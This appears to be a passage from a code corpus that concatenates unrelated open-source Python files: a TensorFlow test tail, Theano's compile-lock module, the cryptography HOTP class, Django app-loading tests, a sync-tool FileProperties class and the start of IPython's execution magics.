    # Numeric gradient check of the slice w.r.t. the input values, for
    # several representative column slices.
    sp_input = self._SparseTensor_4x6(val_dtype=np.float32)
    start_and_size = [([0, 0], [4, 2]),
                      ([0, 2], [5, 2]),
                      ([0, 4], [5, 3])]

    with self.session(use_gpu=False):
      for start, size in start_and_size:
        sp_output = sparse_ops.sparse_slice(sp_input, start, size)
        nnz_in = len(sp_input.values.eval())
        nnz_out = len(sp_output.values.eval())
        err = gradient_checker.compute_gradient_error(
            [sp_input.values], [(nnz_in,)], sp_output.values, (nnz_out,))
        self.assertLess(err, 1e-3)
# Run the test suite when this file is executed as a script.
if __name__ == '__main__':
  test.main()
| apache-2.0 |
JazzeYoung/VeryDeepAutoEncoder | theano/gof/compilelock.py | 2 | 14196 | # Locking mechanism to ensure no two compilations occur simultaneously
# in the same compilation directory (which can cause crashes).
from __future__ import absolute_import, print_function, division
import atexit
import os
import socket # only used for gethostname()
import time
import logging
from contextlib import contextmanager
import numpy as np
from theano import config
# Seeded RNG used for the randomized wait intervals between lock attempts.
random = np.random.RandomState([2015, 8, 2])
_logger = logging.getLogger("theano.gof.compilelock")
# If the user provided a logging level, we don't want to override it.
if _logger.level == logging.NOTSET:
    # INFO will show the "Refreshing lock" messages
    _logger.setLevel(logging.INFO)
# Host name is embedded in lock ids so we can tell whether a lock owner
# runs on this machine (and thus whether its pid can be probed).
hostname = socket.gethostname()
def force_unlock():
    """
    Delete the compilation lock if someone else has it.
    Implemented by acquiring the lock with a zero timeout (which
    overrides any existing owner) and then immediately releasing it.
    """
    get_lock(min_wait=0, max_wait=0.001, timeout=0)
    release_lock()
@contextmanager
def lock_ctx(lock_dir=None, keep_lock=False, **kw):
    """
    Context manager holding the compilation lock around the enclosed block.

    Parameters
    ----------
    lock_dir : str, optional
        Lock directory forwarded to `get_lock` (defaults to the directory
        under `config.compiledir`).
    keep_lock : bool
        If True, the lock is left held when the block exits; the caller
        then owns the matching `release_lock` call.
    kw
        Additional keyword arguments forwarded to `get_lock`.
    """
    get_lock(lock_dir=lock_dir, **kw)
    try:
        yield
    finally:
        # Release even when the body raises: the previous version skipped
        # release_lock() on exceptions, leaking the lock and stalling other
        # processes until their timeout expired.
        if not keep_lock:
            release_lock()
# We define this name with an underscore so that python shutdown
# deletes this before non-underscore names (like os). We need to do
# it this way to avoid errors on shutdown.
def _get_lock(lock_dir=None, **kw):
    """
    Obtain lock on compilation directory.
    Parameters
    ----------
    lock_dir : str, optional
        Directory to lock on.  Defaults to 'lock_dir' inside
        `config.compiledir`.
    kw
        Additional arguments to be forwarded to the `lock` function when
        acquiring the lock.
    Notes
    -----
    We can lock only on 1 directory at a time.  The lock is re-entrant:
    state (`n_lock`, `start_time`, `unlocker`, ...) is kept as attributes
    on the public `get_lock` alias defined below.
    """
    if lock_dir is None:
        lock_dir = os.path.join(config.compiledir, 'lock_dir')
    if not hasattr(get_lock, 'n_lock'):
        # Initialization.
        get_lock.n_lock = 0
        if not hasattr(get_lock, 'lock_is_enabled'):
            # Enable lock by default.
            get_lock.lock_is_enabled = True
        get_lock.lock_dir = lock_dir
        get_lock.unlocker = Unlocker(get_lock.lock_dir)
    else:
        if lock_dir != get_lock.lock_dir:
            # Compilation directory has changed.
            # First ensure all old locks were released.
            assert get_lock.n_lock == 0
            # Update members for new compilation directory.
            get_lock.lock_dir = lock_dir
            get_lock.unlocker = Unlocker(get_lock.lock_dir)
    if get_lock.lock_is_enabled:
        # Only really try to acquire the lock if we do not have it already.
        if get_lock.n_lock == 0:
            lock(get_lock.lock_dir, **kw)
            # Ensure the lock is released at interpreter exit, even if the
            # caller forgets to (or crashes before) calling release_lock.
            atexit.register(Unlocker.unlock, get_lock.unlocker)
            # Store time at which the lock was set.
            get_lock.start_time = time.time()
        else:
            # Check whether we need to 'refresh' the lock. We do this
            # every 'config.compile.timeout / 2' seconds to ensure
            # no one else tries to override our lock after their
            # 'config.compile.timeout' timeout period.
            if get_lock.start_time is None:
                # This should not happen. So if this happen, clean up
                # the lock state and raise an error.
                while get_lock.n_lock > 0:
                    release_lock()
                raise Exception("For some unknow reason, the lock was already "
                                "taken, but no start time was registered.")
            now = time.time()
            if now - get_lock.start_time > config.compile.timeout / 2:
                lockpath = os.path.join(get_lock.lock_dir, 'lock')
                _logger.info('Refreshing lock %s', str(lockpath))
                refresh_lock(lockpath)
                get_lock.start_time = now
    get_lock.n_lock += 1
# Public alias; underscore-prefixed definition survives longer at
# interpreter shutdown (see module comment above).
get_lock = _get_lock
def release_lock():
    """
    Release lock on compilation directory.
    The lock is reference-counted: it is only physically released once
    every nested `get_lock` call has been matched by a `release_lock`.
    """
    get_lock.n_lock -= 1
    assert get_lock.n_lock >= 0
    # Only really release lock once all lock requests have ended.
    if get_lock.lock_is_enabled and get_lock.n_lock == 0:
        get_lock.start_time = None
        get_lock.unlocker.unlock(force=False)
def set_lock_status(use_lock):
    """
    Enable or disable the lock on the compilation directory (which is enabled
    by default). Disabling may make compilation slightly faster (but is not
    recommended for parallel execution).
    Parameters
    ----------
    use_lock : bool
        Whether to use the compilation lock or not.
    """
    # Stored on the get_lock function object, like the rest of the lock state.
    get_lock.lock_is_enabled = use_lock
# Sentinel default for `timeout` below; needed because None is itself a
# valid timeout value (meaning "never override an existing lock").
notset = object()
def lock(tmp_dir, timeout=notset, min_wait=None, max_wait=None, verbosity=1):
    """
    Obtain lock access by creating a given temporary directory (whose base will
    be created if needed, but will not be deleted after the lock is removed).
    If access is refused by the same lock owner during more than 'timeout'
    seconds, then the current lock is overridden. If timeout is None, then no
    timeout is performed.
    The lock is performed by creating a 'lock' file in 'tmp_dir' that contains
    a unique id identifying the owner of the lock (the process id, followed by
    a random string).
    When there is already a lock, the process sleeps for a random amount of
    time between min_wait and max_wait seconds before trying again.
    If 'verbosity' is >= 1, then a message will be displayed when we need to
    wait for the lock. If it is set to a value >1, then this message will be
    displayed each time we re-check for the presence of the lock. Otherwise it
    is displayed only when we notice the lock's owner has changed.
    Parameters
    ----------
    tmp_dir : str
        Lock directory that will be created when acquiring the lock.
    timeout : int or None
        Time (in seconds) to wait before replacing an existing lock (default
        config 'compile.timeout').
    min_wait: int
        Minimum time (in seconds) to wait before trying again to get the lock
        (default config 'compile.wait').
    max_wait: int
        Maximum time (in seconds) to wait before trying again to get the lock
        (default 2 * min_wait).
    verbosity : int
        Amount of feedback displayed to screen (default 1).
    """
    if min_wait is None:
        min_wait = config.compile.wait
    if max_wait is None:
        max_wait = min_wait * 2
    if timeout is notset:
        timeout = config.compile.timeout
    # Create base of lock directory if required.
    base_lock = os.path.dirname(tmp_dir)
    if not os.path.isdir(base_lock):
        try:
            os.makedirs(base_lock)
        except OSError:
            # Someone else was probably trying to create it at the same time.
            # We wait two seconds just to make sure the following assert does
            # not fail on some NFS systems.
            time.sleep(2)
        assert os.path.isdir(base_lock)
    # Variable initialization.
    lock_file = os.path.join(tmp_dir, 'lock')
    my_pid = os.getpid()
    no_display = (verbosity == 0)
    nb_error = 0
    # Number of times we have slept while waiting, without an error.
    # Used to skip the "waiting" message on the first pass so it is
    # displayed less frequently (and generates less log/email noise).
    nb_wait = 0
    # Acquire lock.  The outer loop retries after transient errors
    # (up to 10 in a row before giving up and re-raising).
    while True:
        try:
            last_owner = 'no_owner'
            time_start = time.time()
            other_dead = False
            # Spin while someone else holds the lock, i.e. while the lock
            # directory exists.
            while os.path.isdir(tmp_dir):
                try:
                    with open(lock_file) as f:
                        read_owner = f.readlines()[0].strip()
                    # The try is transition code for old locks.
                    # It may be removed when people have upgraded.
                    try:
                        other_host = read_owner.split('_')[2]
                    except IndexError:
                        other_host = ()  # make sure it isn't equal to any host
                    if other_host == hostname:
                        try:
                            # Just check if the other process still exists
                            # (signal 0 does not actually deliver a signal).
                            os.kill(int(read_owner.split('_')[0]), 0)
                        except OSError:
                            other_dead = True
                        except AttributeError:
                            pass  # os.kill does not exist on windows
                except Exception:
                    read_owner = 'failure'
                if other_dead:
                    if not no_display:
                        msg = "process '%s'" % read_owner.split('_')[0]
                        _logger.warning("Overriding existing lock by dead %s "
                                        "(I am process '%s')", msg, my_pid)
                    get_lock.unlocker.unlock(force=True)
                    continue
                if last_owner == read_owner:
                    if (timeout is not None and
                            time.time() - time_start >= timeout):
                        # Timeout exceeded or locking process dead.
                        if not no_display:
                            if read_owner == 'failure':
                                msg = 'unknown process'
                            else:
                                msg = "process '%s'" % read_owner.split('_')[0]
                        _logger.warning("Overriding existing lock by %s "
                                        "(I am process '%s')", msg, my_pid)
                        get_lock.unlocker.unlock(force=True)
                        continue
                else:
                    # Owner changed: restart the timeout clock for the new one.
                    last_owner = read_owner
                    time_start = time.time()
                    no_display = (verbosity == 0)
                if not no_display and nb_wait > 0:
                    if read_owner == 'failure':
                        msg = 'unknown process'
                    else:
                        msg = "process '%s'" % read_owner.split('_')[0]
                    _logger.info("Waiting for existing lock by %s (I am "
                                 "process '%s')", msg, my_pid)
                    _logger.info("To manually release the lock, delete %s",
                                 tmp_dir)
                if verbosity <= 1:
                    no_display = True
                nb_wait += 1
                time.sleep(random.uniform(min_wait, max_wait))
            try:
                # mkdir is atomic, even on NFS: whoever creates the
                # directory first owns the lock.
                os.mkdir(tmp_dir)
            except OSError:
                # Error while creating the directory: someone else
                # must have tried at the exact same time.
                nb_error += 1
                if nb_error < 10:
                    continue
                else:
                    raise
            # Safety check: the directory should be here.
            assert os.path.isdir(tmp_dir)
            # Write own id into lock file.
            unique_id = refresh_lock(lock_file)
            # Verify we are really the lock owner (this should not be needed,
            # but better be safe than sorry).
            with open(lock_file) as f:
                owner = f.readlines()[0].strip()
            if owner != unique_id:
                # Too bad, try again.
                continue
            else:
                # We got the lock, hoorray!
                return
        except Exception as e:
            # If something wrong happened, we try again.
            _logger.warning("Something wrong happened: %s %s", type(e), e)
            nb_error += 1
            if nb_error > 10:
                raise
            time.sleep(random.uniform(min_wait, max_wait))
            continue
def refresh_lock(lock_file):
    """
    'Refresh' an existing lock by re-writing the file containing the owner's
    unique id, using a new (randomly generated) id, which is also returned.

    Parameters
    ----------
    lock_file : str
        Path of the lock file to (re-)write.

    Returns
    -------
    str
        The new owner id, of the form '<pid>_<random digits>_<hostname>'.
    """
    unique_id = '%s_%s_%s' % (
        os.getpid(),
        ''.join([str(random.randint(0, 9)) for i in range(10)]),
        hostname)
    try:
        with open(lock_file, 'w') as lock_write:
            lock_write.write(unique_id + '\n')
    except Exception:
        # In some strange case, this happen. To prevent all tests
        # from failing, we release the lock, but as there is a
        # problem, we still keep the original exception.
        # This way, only 1 test would fail.
        while get_lock.n_lock > 0:
            release_lock()
        # Use logging's ``warning`` method: ``warn`` is a deprecated alias.
        _logger.warning('Refreshing lock failed, we release the'
                        ' lock before raising again the exception')
        raise
    return unique_id
class Unlocker(object):
    """
    Class wrapper around the lock-release mechanism.  An instance is
    registered with ``atexit`` so the lock is automatically released when
    the program exits, even when crashing or being interrupted.
    """

    def __init__(self, tmp_dir):
        # Directory whose existence represents the lock.
        self.tmp_dir = tmp_dir

    def unlock(self, force=False):
        """
        Remove current lock.

        Failures to delete the lock file or the lock directory are
        silently ignored: multiple jobs running in parallel are allowed to
        unlock the same directory at the same time (e.g. when reaching
        their timeout limit), so the entries may already be gone.

        Parameters
        ----------
        force : bool
            When False, delete the lock only if this process on this host
            still owns it; when True, delete it unconditionally.
        """
        lock_path = os.path.join(self.tmp_dir, 'lock')
        if not force:
            # Bail out if another process took over our lock in the
            # meantime: its id (pid_random_hostname) would differ from
            # ours.  Any read/parse error means "unknown owner" and we
            # fall through to the removal attempt.
            try:
                with open(lock_path) as handle:
                    owner_id = handle.readlines()[0].strip()
                owner_pid, _, owner_host = owner_id.split('_')
                if owner_pid != str(os.getpid()) or owner_host != hostname:
                    return
            except Exception:
                pass
        # The two removals are attempted independently on purpose: even if
        # deleting the file fails (e.g. it no longer exists), we still want
        # to try removing the directory.
        try:
            os.remove(lock_path)
        except Exception:
            pass
        try:
            os.rmdir(self.tmp_dir)
        except Exception:
            pass
| bsd-3-clause |
zlsun/XX-Net | code/default/python27/1.0/lib/win32/cryptography/hazmat/primitives/twofactor/hotp.py | 32 | 2516 | # This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
import struct
import six
from cryptography.exceptions import (
UnsupportedAlgorithm, _Reasons
)
from cryptography.hazmat.backends.interfaces import HMACBackend
from cryptography.hazmat.primitives import constant_time, hmac
from cryptography.hazmat.primitives.hashes import SHA1, SHA256, SHA512
from cryptography.hazmat.primitives.twofactor import InvalidToken
from cryptography.hazmat.primitives.twofactor.utils import _generate_uri
class HOTP(object):
    """
    HMAC-based one-time password (RFC 4226).

    Generates and verifies counter-based OTP values derived from a shared
    secret key using the RFC's dynamic-truncation scheme.
    """

    def __init__(self, key, length, algorithm, backend):
        # Validation order is significant: callers may rely on which
        # exception type is raised first (backend, key, length, algorithm).
        if not isinstance(backend, HMACBackend):
            raise UnsupportedAlgorithm(
                "Backend object does not implement HMACBackend.",
                _Reasons.BACKEND_MISSING_INTERFACE
            )
        if len(key) < 16:
            raise ValueError("Key length has to be at least 128 bits.")
        if not isinstance(length, six.integer_types):
            raise TypeError("Length parameter must be an integer type.")
        if length < 6 or length > 8:
            raise ValueError("Length of HOTP has to be between 6 to 8.")
        if not isinstance(algorithm, (SHA1, SHA256, SHA512)):
            raise TypeError("Algorithm must be SHA1, SHA256 or SHA512.")
        self._key = key
        self._length = length
        self._algorithm = algorithm
        self._backend = backend

    def generate(self, counter):
        """Return the OTP for *counter* as zero-padded ASCII digit bytes."""
        otp = self._dynamic_truncate(counter) % (10 ** self._length)
        return "{0:0{1}}".format(otp, self._length).encode()

    def verify(self, hotp, counter):
        """Raise InvalidToken unless *hotp* matches the value for *counter*."""
        if not constant_time.bytes_eq(self.generate(counter), hotp):
            raise InvalidToken("Supplied HOTP value does not match.")

    def _dynamic_truncate(self, counter):
        # HMAC over the big-endian 64-bit counter (RFC 4226, section 5.3).
        hmac_ctx = hmac.HMAC(self._key, self._algorithm, self._backend)
        hmac_ctx.update(struct.pack(">Q", counter))
        digest = hmac_ctx.finalize()
        # The low nibble of the last digest byte selects a 4-byte window.
        offset = six.indexbytes(digest, len(digest) - 1) & 0b1111
        window = digest[offset:offset + 4]
        # Mask the sign bit so the result is a 31-bit unsigned integer.
        return struct.unpack(">I", window)[0] & 0x7fffffff

    def get_provisioning_uri(self, account_name, counter, issuer):
        """Return an otpauth:// provisioning URI for *account_name*."""
        return _generate_uri(self, "hotp", account_name, issuer, [
            ("counter", int(counter)),
        ])
| bsd-2-clause |
yangming85/lettuce | tests/integration/lib/Django-1.3/tests/regressiontests/app_loading/tests.py | 48 | 3019 | import copy
import os
import sys
import time
from django.conf import Settings
from django.db.models.loading import cache, load_app
from django.utils.unittest import TestCase
class InstalledAppsGlobbingTest(TestCase):
    """Checks that glob patterns in INSTALLED_APPS are expanded."""

    def setUp(self):
        # Remember interpreter state that loading the settings may disturb.
        self.OLD_SYS_PATH = sys.path[:]
        sys.path.append(os.path.dirname(os.path.abspath(__file__)))
        self.OLD_TZ = os.environ.get("TZ")

    def test_globbing(self):
        expanded = Settings('test_settings').INSTALLED_APPS
        self.assertEqual(expanded, ['parent.app', 'parent.app1', 'parent.app_2'])

    def tearDown(self):
        sys.path = self.OLD_SYS_PATH
        # Loading settings may have changed the process time zone; restore it.
        if hasattr(time, "tzset") and self.OLD_TZ:
            os.environ["TZ"] = self.OLD_TZ
            time.tzset()
class EggLoadingTest(TestCase):
    # Verifies that Django can load app models modules from .egg archives,
    # both as top-level apps and nested under an egg's package.
    # NOTE: this is Python 2 code (``except ImportError, e`` below).
    def setUp(self):
        self.old_path = sys.path[:]
        self.egg_dir = '%s/eggs' % os.path.dirname(__file__)
        # This test adds dummy applications to the app cache. These
        # need to be removed in order to prevent bad interactions
        # with the flush operation in other tests.
        self.old_app_models = copy.deepcopy(cache.app_models)
        self.old_app_store = copy.deepcopy(cache.app_store)
    def tearDown(self):
        # Undo the sys.path extensions and restore the saved app cache.
        sys.path = self.old_path
        cache.app_models = self.old_app_models
        cache.app_store = self.old_app_store
    def test_egg1(self):
        """Models module can be loaded from an app in an egg"""
        egg_name = '%s/modelapp.egg' % self.egg_dir
        sys.path.append(egg_name)
        models = load_app('app_with_models')
        self.assertFalse(models is None)
    def test_egg2(self):
        """Loading an app from an egg that has no models returns no models (and no error)"""
        egg_name = '%s/nomodelapp.egg' % self.egg_dir
        sys.path.append(egg_name)
        models = load_app('app_no_models')
        self.assertTrue(models is None)
    def test_egg3(self):
        """Models module can be loaded from an app located under an egg's top-level package"""
        egg_name = '%s/omelet.egg' % self.egg_dir
        sys.path.append(egg_name)
        models = load_app('omelet.app_with_models')
        self.assertFalse(models is None)
    def test_egg4(self):
        """Loading an app with no models from under the top-level egg package generates no error"""
        egg_name = '%s/omelet.egg' % self.egg_dir
        sys.path.append(egg_name)
        models = load_app('omelet.app_no_models')
        self.assertTrue(models is None)
    def test_egg5(self):
        """Loading an app from an egg that has an import error in its models module raises that error"""
        egg_name = '%s/brokenapp.egg' % self.egg_dir
        sys.path.append(egg_name)
        self.assertRaises(ImportError, load_app, 'broken_app')
        try:
            load_app('broken_app')
        except ImportError, e:
            # Make sure the message is indicating the actual
            # problem in the broken app.
            self.assertTrue("modelz" in e.args[0])
| gpl-3.0 |
NERC-CEH/jules-jasmin | groupworkspace_sync/sync/file_properties.py | 1 | 2448 | """
# Majic
# Copyright (C) 2015 CEH
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
"""
class FileProperties(object):
    """
    Important properties of a file needing to be synchronised
    """
    def __init__(self, file_path, owner, is_published, is_public):
        """
        constructor
        :param file_path: path to the file relative to the root
        :param owner: userid of the user who owns the file
        :param is_published: True if the file is published, false otherwise (i.e. readable by majic users)
        :param is_public: True if the file is public, false otherwise (i.e. readable by everyone)
        """
        self.file_path = file_path
        self.owner = owner
        self.is_published = is_published
        self.is_public = is_public
    def __repr__(self):
        # NOTE(review): the 'model_owner' label in this string refers to the
        # 'owner' attribute; the wording is kept as-is because it is runtime
        # output that callers/logs may depend on.
        return "{} (model_owner:{}, published?:{}, public?:{})"\
            .format(self.file_path, self.owner, self.is_published, self.is_public)
    def __cmp__(self, other):
        """
        Compare two File properties
        Order is file_path, owner, is_published, is_public
        :param other: other File Property to compare
        :return: negative integer if self < other, zero if self == other, a positive integer if self > other
        """
        # NOTE: __cmp__ (and bool.__cmp__ below) only exists in Python 2;
        # this class would need __eq__/__lt__ to order under Python 3.
        if self.file_path != other.file_path:
            if self.file_path < other.file_path:
                return -1
            else:
                return 1
        if self.owner != other.owner:
            if self.owner < other.owner:
                return -1
            else:
                return 1
        result = self.is_published.__cmp__(other.is_published)
        if result == 0:
            result = self.is_public.__cmp__(other.is_public)
        return result
Edu-Glez/Bank_sentiment_analysis | env/lib/python3.6/site-packages/IPython/core/magics/execution.py | 6 | 52758 | # -*- coding: utf-8 -*-
"""Implementation of execution-related magic functions."""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
from __future__ import print_function
from __future__ import absolute_import
import ast
import bdb
import gc
import itertools
import os
import sys
import time
import timeit
from pdb import Restart
# cProfile was added in Python2.5
try:
import cProfile as profile
import pstats
except ImportError:
# profile isn't bundled by default in Debian for license reasons
try:
import profile, pstats
except ImportError:
profile = pstats = None
from IPython.core import oinspect
from IPython.core import magic_arguments
from IPython.core import page
from IPython.core.error import UsageError
from IPython.core.macro import Macro
from IPython.core.magic import (Magics, magics_class, line_magic, cell_magic,
line_cell_magic, on_off, needs_local_scope)
from IPython.testing.skipdoctest import skip_doctest
from IPython.utils import py3compat
from IPython.utils.py3compat import builtin_mod, iteritems, PY3
from IPython.utils.contexts import preserve_keys
from IPython.utils.capture import capture_output
from IPython.utils.ipstruct import Struct
from IPython.utils.module_paths import find_mod
from IPython.utils.path import get_py_filename, shellglob
from IPython.utils.timing import clock, clock2
from warnings import warn
from logging import error
if PY3:
from io import StringIO
else:
from StringIO import StringIO
#-----------------------------------------------------------------------------
# Magic implementation classes
#-----------------------------------------------------------------------------
class TimeitResult(object):
    """
    Object returned by the timeit magic with info about the run.

    Contains the following attributes :
    loops: (int) number of loops done per measurement
    repeat: (int) number of times the measurement has been repeated
    best: (float) best execution time / number
    all_runs: (list of float) execution time of each run (in s)
    compile_time: (float) time of statement compilation (s)
    """

    def __init__(self, loops, repeat, best, worst, all_runs, compile_time, precision):
        self.loops = loops
        self.repeat = repeat
        self.best = best
        self.worst = worst
        self.all_runs = all_runs
        self.compile_time = compile_time
        self._precision = precision

    def _repr_pretty_(self, p, cycle):
        # Pluralize "loop" only when more than one loop ran per measurement.
        plural = u"" if self.loops == 1 else u"s"
        summary = u"%d loop%s, best of %d: %s per loop" % (
            self.loops, plural, self.repeat,
            _format_time(self.best, self._precision))
        p.text(u'<TimeitResult : ' + summary + u'>')
class TimeitTemplateFiller(ast.NodeTransformer):
    """Fill in the AST template for timing execution.

    This is quite closely tied to the template definition, which is in
    :meth:`ExecutionMagics.timeit`.
    """

    def __init__(self, ast_setup, ast_stmt):
        # Parsed setup code and parsed statement-to-time, both ast.Module.
        self.ast_setup = ast_setup
        self.ast_stmt = ast_stmt

    def visit_FunctionDef(self, node):
        "Fill in the setup statement"
        # Transform children first so the for-loop placeholder is already
        # replaced before we splice the setup code in.
        self.generic_visit(node)
        if node.name == "inner":
            node.body[:1] = self.ast_setup.body
        return node

    def visit_For(self, node):
        "Fill in the statement to be timed"
        first_stmt = node.body[0]
        placeholder = getattr(getattr(first_stmt, 'value', None), 'id', None)
        if placeholder == 'stmt':
            node.body = self.ast_stmt.body
        return node
class Timer(timeit.Timer):
    """Timer class that explicitly uses self.inner
    which is an undocumented implementation detail of CPython,
    not shared by PyPy.
    """
    # Timer.timeit copied from CPython 3.4.2
    # NOTE: keep this method byte-for-byte in sync with the CPython copy;
    # it exists only to force use of self.inner (see class docstring).
    def timeit(self, number=timeit.default_number):
        """Time 'number' executions of the main statement.
        To be precise, this executes the setup statement once, and
        then returns the time it takes to execute the main statement
        a number of times, as a float measured in seconds. The
        argument is the number of times through the loop, defaulting
        to one million. The main statement, the setup statement and
        the timer function to be used are passed to the constructor.
        """
        it = itertools.repeat(None, number)
        # Disable the garbage collector so collection pauses do not skew
        # the measurement; its previous state is restored afterwards.
        gcold = gc.isenabled()
        gc.disable()
        try:
            timing = self.inner(it, self.timer)
        finally:
            if gcold:
                gc.enable()
        return timing
@magics_class
class ExecutionMagics(Magics):
"""Magics related to code execution, debugging, profiling, etc.
"""
    def __init__(self, shell):
        """Initialize the execution magics for *shell*, degrading gracefully
        when the (non-free) profile module is unavailable."""
        super(ExecutionMagics, self).__init__(shell)
        if profile is None:
            # Replace %prun with a stub that explains how to get a profiler.
            self.prun = self.profile_missing_notice
        # Default execution function used to actually run user code.
        self.default_runner = None
    def profile_missing_notice(self, *args, **kwargs):
        # Stand-in for %prun when the profile module is missing (see
        # __init__); accepts and ignores any magic arguments.
        error("""\
The profile module could not be found. It has been removed from the standard
python packages because of its non-free license. To use profiling, install the
python-profiler package from non-free.""")
    @skip_doctest
    @line_cell_magic
    def prun(self, parameter_s='', cell=None):
        """Run a statement through the python code profiler.
        Usage, in line mode:
          %prun [options] statement
        Usage, in cell mode:
          %%prun [options] [statement]
          code...
          code...
        In cell mode, the additional code lines are appended to the (possibly
        empty) statement in the first line. Cell mode allows you to easily
        profile multiline blocks without having to put them in a separate
        function.
        The given statement (which doesn't require quote marks) is run via the
        python profiler in a manner similar to the profile.run() function.
        Namespaces are internally managed to work correctly; profile.run
        cannot be used in IPython because it makes certain assumptions about
        namespaces which do not hold under IPython.
        Options:
        -l <limit>
          you can place restrictions on what or how much of the
          profile gets printed. The limit value can be:
          * A string: only information for function names containing this string
            is printed.
          * An integer: only these many lines are printed.
          * A float (between 0 and 1): this fraction of the report is printed
            (for example, use a limit of 0.4 to see the topmost 40% only).
          You can combine several limits with repeated use of the option. For
          example, ``-l __init__ -l 5`` will print only the topmost 5 lines of
          information about class constructors.
        -r
          return the pstats.Stats object generated by the profiling. This
          object has all the information about the profile in it, and you can
          later use it for further analysis or in other functions.
        -s <key>
          sort profile by given key. You can provide more than one key
          by using the option several times: '-s key1 -s key2 -s key3...'. The
          default sorting key is 'time'.
          The following is copied verbatim from the profile documentation
          referenced below:
          When more than one key is provided, additional keys are used as
          secondary criteria when the there is equality in all keys selected
          before them.
          Abbreviations can be used for any key names, as long as the
          abbreviation is unambiguous. The following are the keys currently
          defined:
          ============ =====================
          Valid Arg    Meaning
          ============ =====================
          "calls"      call count
          "cumulative" cumulative time
          "file"       file name
          "module"     file name
          "pcalls"     primitive call count
          "line"       line number
          "name"       function name
          "nfl"        name/file/line
          "stdname"    standard name
          "time"       internal time
          ============ =====================
          Note that all sorts on statistics are in descending order (placing
          most time consuming items first), where as name, file, and line number
          searches are in ascending order (i.e., alphabetical). The subtle
          distinction between "nfl" and "stdname" is that the standard name is a
          sort of the name as printed, which means that the embedded line
          numbers get compared in an odd way. For example, lines 3, 20, and 40
          would (if the file names were the same) appear in the string order
          "20" "3" and "40". In contrast, "nfl" does a numeric compare of the
          line numbers. In fact, sort_stats("nfl") is the same as
          sort_stats("name", "file", "line").
        -T <filename>
          save profile results as shown on screen to a text
          file. The profile is still shown on screen.
        -D <filename>
          save (via dump_stats) profile statistics to given
          filename. This data is in a format understood by the pstats module, and
          is generated by a call to the dump_stats() method of profile
          objects. The profile is still shown on screen.
        -q
          suppress output to the pager. Best used with -T and/or -D above.
        If you want to run complete programs under the profiler's control, use
        ``%run -p [prof_opts] filename.py [args to program]`` where prof_opts
        contains profiler specific options as described here.
        You can read the complete documentation for the profile module with::
          In [1]: import profile; profile.help()
        """
        opts, arg_str = self.parse_options(parameter_s, 'D:l:rs:T:q',
                                           list_all=True, posix=False)
        # In cell mode, profile the first-line statement plus the cell body.
        if cell is not None:
            arg_str += '\n' + cell
        # Apply IPython's input transformations (magics etc.) before running.
        arg_str = self.shell.input_splitter.transform_cell(arg_str)
        return self._run_with_profiler(arg_str, opts, self.shell.user_ns)
def _run_with_profiler(self, code, opts, namespace):
"""
Run `code` with profiler. Used by ``%prun`` and ``%run -p``.
Parameters
----------
code : str
Code to be executed.
opts : Struct
Options parsed by `self.parse_options`.
namespace : dict
A dictionary for Python namespace (e.g., `self.shell.user_ns`).
"""
# Fill default values for unspecified options:
opts.merge(Struct(D=[''], l=[], s=['time'], T=['']))
prof = profile.Profile()
try:
prof = prof.runctx(code, namespace, namespace)
sys_exit = ''
except SystemExit:
sys_exit = """*** SystemExit exception caught in code being profiled."""
stats = pstats.Stats(prof).strip_dirs().sort_stats(*opts.s)
lims = opts.l
if lims:
lims = [] # rebuild lims with ints/floats/strings
for lim in opts.l:
try:
lims.append(int(lim))
except ValueError:
try:
lims.append(float(lim))
except ValueError:
lims.append(lim)
# Trap output.
stdout_trap = StringIO()
stats_stream = stats.stream
try:
stats.stream = stdout_trap
stats.print_stats(*lims)
finally:
stats.stream = stats_stream
output = stdout_trap.getvalue()
output = output.rstrip()
if 'q' not in opts:
page.page(output)
print(sys_exit, end=' ')
dump_file = opts.D[0]
text_file = opts.T[0]
if dump_file:
prof.dump_stats(dump_file)
print('\n*** Profile stats marshalled to file',\
repr(dump_file)+'.',sys_exit)
if text_file:
pfile = open(text_file,'w')
pfile.write(output)
pfile.close()
print('\n*** Profile printout saved to text file',\
repr(text_file)+'.',sys_exit)
if 'r' in opts:
return stats
else:
return None
@line_magic
def pdb(self, parameter_s=''):
"""Control the automatic calling of the pdb interactive debugger.
Call as '%pdb on', '%pdb 1', '%pdb off' or '%pdb 0'. If called without
argument it works as a toggle.
When an exception is triggered, IPython can optionally call the
interactive pdb debugger after the traceback printout. %pdb toggles
this feature on and off.
The initial state of this feature is set in your configuration
file (the option is ``InteractiveShell.pdb``).
If you want to just activate the debugger AFTER an exception has fired,
without having to type '%pdb on' and rerunning your code, you can use
the %debug magic."""
par = parameter_s.strip().lower()
if par:
try:
new_pdb = {'off':0,'0':0,'on':1,'1':1}[par]
except KeyError:
print ('Incorrect argument. Use on/1, off/0, '
'or nothing for a toggle.')
return
else:
# toggle
new_pdb = not self.shell.call_pdb
# set on the shell
self.shell.call_pdb = new_pdb
print('Automatic pdb calling has been turned',on_off(new_pdb))
    @skip_doctest
    @magic_arguments.magic_arguments()
    @magic_arguments.argument('--breakpoint', '-b', metavar='FILE:LINE',
        help="""
        Set break point at LINE in FILE.
        """
    )
    @magic_arguments.argument('statement', nargs='*',
        help="""
        Code to run in debugger.
        You can omit this in cell magic mode.
        """
    )
    @line_cell_magic
    def debug(self, line='', cell=None):
        """Activate the interactive debugger.
        This magic command support two ways of activating debugger.
        One is to activate debugger before executing code. This way, you
        can set a break point, to step through the code from the point.
        You can use this mode by giving statements to execute and optionally
        a breakpoint.
        The other one is to activate debugger in post-mortem mode. You can
        activate this mode simply running %debug without any argument.
        If an exception has just occurred, this lets you inspect its stack
        frames interactively. Note that this will always work only on the last
        traceback that occurred, so you must call this quickly after an
        exception that you wish to inspect has fired, because if another one
        occurs, it clobbers the previous one.
        If you want IPython to automatically do this on every exception, see
        the %pdb magic for more details.
        """
